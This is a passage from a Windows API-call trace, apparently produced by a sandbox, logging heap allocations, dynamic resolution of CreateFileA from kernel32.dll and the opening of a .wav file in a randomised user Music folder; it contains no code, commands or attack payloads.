| out: hHeap=0x8a0000) returned 1 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba228 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0187.626] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0187.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0187.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0187.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.630] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.633] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0187.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda50 [0187.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0187.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.633] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0187.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0187.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0187.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.634] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0187.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0187.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0187.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x41) returned 0x9aa548 [0187.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", cchWideChar=65, lpMultiByteStr=0x9aa548, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", lpUsedDefaultChar=0x0) returned 65 [0187.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.635] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\olqmc1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x82) returned 0x907778 [0187.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=65, lpWideCharStr=0x907778, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav") returned 65 [0187.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0187.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0187.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 